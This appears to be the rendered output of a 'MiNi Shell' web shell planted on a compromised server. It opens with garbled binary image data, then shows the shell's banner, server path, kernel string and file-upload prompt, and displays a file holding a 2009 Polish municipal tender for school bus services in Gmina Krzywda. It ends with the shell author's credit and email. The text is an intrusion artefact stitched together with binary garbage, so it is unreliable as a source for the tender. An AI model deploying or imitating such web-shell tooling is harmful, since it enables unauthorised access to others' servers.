JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090716/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20090716/113767-N-2009.html

<p class="kh_header"><b>Krzywda: Przewozy szkolne do placówek oświatowych na terenie Gminy Krzywda</b><br>
<b>Numer ogłoszenia: 113767 - 2009; data zamieszczenia: 16.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Krzywda , ul. Żelechowska 24B, 21-470 Krzywda, woj. lubelskie, tel. 025 7551006, faks 025 7551061.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gminakrzywda.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.krzywda.netbip.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przewozy szkolne do placówek oświatowych na terenie Gminy Krzywda.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są przewozy szkolne uczniów szkół podstawowych i gimnazjów do placówek oświatowych na terenie Gminy Krzywda.
Zamawiający nie dopuszcza możliwości składania ofert częściowych.

Opis przedmiotu zamówienia:

Zakres zamówienia obejmuje m.in.:
Wykonawca zobowiązuje się od dnia 01.09.2009r, do końca roku szkolnego 2009/2010 tj. do dnia 25.06.2010 wykonywać na zamówienie Zamawiającego następujące usługi polegające na dowozach i odwozach uczniów 
Szkoły podstawowej w Fiukówce,
Zespołu Szkół w Hucie Dąbrowie
Zespołu Szkół w Okrzei 
według harmonogramu określającego trasę przejazdu z wyszczególnieniem kilometrów  stanowiącego załącznik do SIWZ. Każdy kurs powinien być wykonywany zgodnie z rozkładem jazdy ustalonym przez dyrektorów szkół, przy czym godziny odjazdu mogą się zmienić ze względu na zmiany w planach zajęć.

Przewozy uczniów wraz z opiekunami do Szkoły Podstawowej w Fiukówce z/do miejscowości: Laski, Wielgolas, Kasyldów, Stary Patok, Nowy Patok. 
Przewóz uczniów wraz z opiekunem do Zespołu Szkół w Hucie Dąbrowie z/do miejscowości: Kasyldów, Laski, Wielgolas, Fiukówka, Teodorów, Podosie, Feliksin, Gołe Łazy, Nowy Świat, Rozłąki.
Przewóz uczniów wraz z opiekunem do Zespołu Szkół w Okrzei z/do miejscowości: Okrzeja, Kokoszka, Okrzeja kol. Dąbrowa, Wojciechówka, Pasmug, Kobylczyk.

Oznaczenie przedmiotu zgodnie z CPV: 60130000-8 Usługi w zakresie specjalistycznego transportu drogowego osób.

Każdy kurs powinien być wykonywany pojazdami przystosowanymi do przewozów szkolnych o pojemności zapewniającej miejsca siedzące wszystkim przewożonym osobom. 
W celu zabezpieczenia prawidłowego przewozu wykonawca ubiegający się o udzielenia zamówienia musi dysponować co najmniej 3 (trzema) sprawnymi autokarami, każdy dla co najmniej 42 osób oraz 1 (jednym) sprawnym autokarem dla co najmniej 20 osób. 
Wykonawca zobowiązany jest do przeprowadzenia wizji lokalnej wskazanych w SIWZ tras przejazdu. 
Wykonawca przygotowując ofertę winien uwzględnić wszystkie terminy określone w SIWZ. Orientacyjna liczba kilometrów do przejazdu w tygodniu - 1479. 

Informacja na temat możliwości powierzenia przez wykonawcę wykonania części lub całości zamówienia podwykonawcom - nie wyraża się zgody na świadczenie usług przez podwykonawców:
1.	Zamawiający nie dopuszcza możliwości składania ofert wariantowych,
2.	Przedmiotem niniejszego postępowania nie jest zawarcie umowy ramowej ,
3.	Zamawiający nie przewiduje możliwości udzielenia zamówień uzupełniających, 
4.	Warunki stawiane wykonawcom ubiegającym się o udzielenie zamówienia: 
O zamówienie mogą ubiegać się  wykonawcy, którzy nie podlegają wykluczeniu z postępowania na podstawie art. 24 Pzp. W przypadku wykonawców (konsorcjum) składających wspólna ofertę stawiane warunki musi spełniać  każdy z wykonawców składających wspólną ofertę. Jeżeli choć jeden z wykonawców wchodzących w skład konsorcjum podlegać będzie wykluczeniu, to wykluczone będzie całe konsorcjum.

Potencjał kadrowy. Wykonawca ubiegający się o zamówienie musi dysponować co najmniej 3 (trzema) osobami, które posiadają uprawnienia do kierowania pojazdami przeznaczonymi do realizacji niniejszego zamówienia oraz posiadają co najmniej 3 letnie doświadczenie zawodowe.
W przypadku wykonawców składających wspólną ofertę warunek winien spełniać co najmniej jeden z podmiotów.
Potencjał techniczny. O zamówienie  mogą ubiegać się wykonawcy dysponujący co najmniej 
-	3 (trzema) autobusami, każdy do przewozu 42 osób,
-	1 (jednym) autobusem do przewozu co najmniej 20 osób 
Każdy autobusy musi posiadać aktualne badania techniczne oraz wyposażenie (sprzęt gaśniczy, apteczki) odpowiednie dla rodzaju pojazdu i zakresu usług.
Potencjał techniczny wykonawcy składającego wspólną ofertę - warunek winien być spełniony łącznie przez składających wspólną ofertę.
Ubezpieczenie od odpowiedzialności cywilnej. O zamówienie mogą ubiegać się Wykonawcy, którzy są ubezpieczeni od odpowiedzialności cywilnej, w zakresie prowadzonej działalności gospodarczej na kwotę nie niższą niż 100 000 PLN;
Podmioty składające wspólną ofertę - warunek muszą spełniać łącznie wszystkie podmioty składające wspólną ofertę..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 60.13.00.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 25.06.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wykonawca pod rygorem nieważności oferty wnosi wadium w wysokości 3 000 zł słownie: trzy tysiące złotych 00/100 najpóźniej do 28.07.2009 r do godz 9.00 
 Wadium może być wnoszone w jednej z form określonych w art. 45 ust 6 upzp. 
Wykonawca sam wybiera sobie formę wadium.
W przypadku wyboru pieniężnej formy, wadium należy wpłacać na konto Urzędu Gminy Nr: 81 9203 0002 0000 1238 2000 0010 BS Krzywda za termin wniesienia wadium uznaje się datę wpływa na rachunek zamawiającego
W przypadku wnoszenia wadium w formie niepieniężnej dokumenty związane z wadium należy złożyć w oryginale w Wydziale Finansowym Urzędu Gminy, w pokoju nr 6. wymagana ważność tej formy - nie krótsza jak okres wiązana ofertą.
Zamawiający zwróci lub zatrzyma wadium, zgodnie z art. 46 upzp.
Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana 
1.	Odmówi podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie
2.	Zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają następujące warunki:
1.	Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień (art. 22 ust. 1 pkt 1 Pzp)
2.	Prowadza działalność gospodarczą na zasadach określonych w przepisach ustawy z dnia 2 lipca 2004r o swobodzie działalności gospodarczej (Dz.U. z 2007r, Nr 127, poz 880) lub kodeksu spółek handlowych 
3.	Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonywania zamówienia (art. 22 ust 1 pkt 2) tj:
-	3 (trzema) autobusami, każdy do przewozu co najmniej 42 osób,
-	1 (jednym) autobusem do przewozu co najmniej 20 osób
-	3 (trzema) osobami posiadającymi uprawnienia do wykonywania przewozów autokarami 
Autobusy muszą posiadać aktualne badania techniczne oraz wyposażenie ( sprzęt gaśniczy, apteczki) odpowiednie dla rodzaju pojazdu i zakresu usług,
4.	Udokumentują, że w ciągu ostatnich 3 (trzech) lat przed dniem wszczęcia postępowania (ukazania się ogłoszenia o niniejszym przetargu w Biuletynie Zamówień Publicznych), a jeżeli okres działalności jest krótszy - w tym okresie zrealizowali co najmniej  jedno zamówienia o zakresie i charakterze porównywalnym z niniejszym zamówieniem 
5.	Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia (art. 22 ust 1 pkt 3) 
6.	Posiadają ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej  - o zamówienie mogą ubiegać się Wykonawcy, którzy są ubezpieczeni od odpowiedzialności cywilnej, w zakresie prowadzonej działalności gospodarczej na kwotę nie niższą niż 100 000 PLN 
7.	Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia, na podstawie art. 24 ust. 1 i 2 ustawy Prawo Zamówień Publicznych

Nie spełnienie chociażby jednego warunku skutkować będzie wykluczeniem Wykonawcy z postępowania.

Z ubiegania o zamówienie publiczne wyklucza się wykonawców, którzy:
1.	Nie spełnią warunków udziału w postępowaniu o zamówienie publiczne z art. 22 ust 1 Prawa Zamówień Publicznych opisanych w pkt 1-4,
2.	Podlegają wykluczeniu z postępowania na podstawie art. 24 ust 1 Prawo Zamówień Publicznych
3.	Wykonywali bezpośrednio czynności związane z przygotowaniem prowadzonego postępowania lub posługiwali się w celu sporządzenia oferty osobami uczestniczącymi w dokonywaniu tych czynności, chyba że udział tych wykonawców w postępowaniu nie utrudnia uczciwej konkurencji
4.	Złożyli nieprawdziwe informacje mające wpływ na wynik prowadzonego postępowania 
5.	Nie złożyli oświadczenia o spełnieniu warunków udziału z postępowania lub dokumentów potwierdzających spełnienie tych warunków z zastrzeżeniem art. 26 ust 3 Prawa Zamówień Publicznych
6.	Nie zgodzili się na przedłużenie okresu wiązania ofertą 


Zamawiający odrzuca ofertę jeżeli wystąpiła przynajmniej jedna z przesłanek unormowana w art. 89 ust 1 Pzp
1.	jest niezgodna z ustawą
2.	jej treść nie odpowiada treści specyfikacji istotnych warunków zamówienia z zastrzeżeniem art. 87 ust 2 pkt 3 
3.	jej złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji
4.	zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia
5.	została złożona przez Wykonawcę wykluczonego z udziału w postępowaniu o udzielenie zamówienia
6.	zawiera omyłki rachunkowe w obliczeniu ceny, których nie można poprawić na podstawie art. 87 ust 2 Prawa Zamówień Publicznych lub błędy w obliczeniu ceny
7.	wykonawca a terminie 3 dni od dnia otrzymania zawiadomienia nie zgodził się na poprawienie omyłki rachunkowej w obliczeniu ceny
8.	jest nieważna na podstawie odrębnych przepisów

Postępowania prowadzi się w języku polskim.
Zamawiający dokona oceny spełnienia powyższych warunków na podstawie złożonych z ofertą dokumentów wymienionych w Specyfikacji Istotnych Warunków Zamówienia. Ocena spełnienia warunków zostanie dokonana formułą spełnia - nie spełnia. Niespełnienie choćby jednego z wymaganych warunków skutkować będzie wykluczeniem wykonawcy z postępowania.

Zamawiający wykluczy z postępowania Wykonawcę, który nie spełnia wymaganych warunków oraz jeżeli stwierdzi, że dostarczone przez niego informacje istotne dla prowadzonego postępowania są nieprawdziwe. Ofertę Wykonawcy wykluczonego uznaje się za odrzuconą  
Zamawiający wezwie Wykonawców, którzy w określonym terminie nie złożyli oświadczeń lub dokumentów potwierdzających spełnienie warunków udziału w postępowaniu, lub którzy złożyli dokumenty zawierające błędy, do uzupełnienia tych dokumentów w określonym terminie (art. 26 ust 3 upzp).</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Oświadczenie, wynikające z art. 22 ust 1 Pzp, którego wzór stanowi załącznik nr 1 do oferty
2. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej jeśli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
3. Pełnomocnictwo do występowania w imieniu wykonawcy, wystawione po dniu ogłoszenia niniejszego przetargu i podpisane wraz z data przez osoby uprawnione lub inne dokumenty potwierdzające posiadanie uprawnień/pełnomocnictw osób składających ofertę o ile nie wynika to z przedstawionych dokumentów.
4. Wykaz osób, które wykonywać będą zamówienie lub będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych niezbędnych do wykonywania zamówienia, a także zakres wykonywanych przez nich czynności - 3 osoby  posiadające uprawnienia do wykonywania przewozów autokarami. (druk do wypełnienia w załączniku nr 4 do SIWZ).
5. Wykaz wykonanych (tj rozpoczętych i zakończonych) w ciągu ostatnich trzech lat usług a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością zamówieniu  stanowiącym przedmiot niniejszego przetargu, z podaniem ich wartości, przedmiotu, daty wykonania, odbiorców oraz załączeniem dokumentów potwierdzających, że zamówienia zostało wykonane należycie (np.  referencje od poprzednich zamawiających).
Dla uznania ważności oferty należy wykazać min 1 usługę (druk do wypełnienia w załączniku do SIWZ - załącznik nr 5 do oferty).
6. Wykaz podmiotów, które będą wykonywać zamówienie lub będą uczestniczyć w wykonywaniu zamówienia wraz z danymi na temat ich kwalifikacji niezbędnych do wykonywania zamówienia oraz zakresu wykonywanych przez nich czynności, rodzaju i wartości powierzonej im części zamówienia
druk do wypełnienia w załączniku do SIWZ - załącznik nr 6 do oferty + kopie uprawnień osób wymienionych w wykazie, potwierdzające, że posiadają one kwalifikacje niezbędne do wykonywania zamówienia).
7. Polisa a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności do kwoty nie mniejszej niż 100 000 zł.
8. Aktualne zaświadczenie  właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających  odpowiednio że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne lub zaświadczeń że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu  - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.krzywda.netbip.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> jak wyżej dla strony internetowej-bezpłatnie. W formie papierowej (wydruk) za pobraniem - 40 zł..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.07.2009 godzina 09:00, miejsce: Urząd Gminy Krzywda
ul. Żelechowska 24B
21-470 Krzywda
sekretariat, pokój nr 3.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com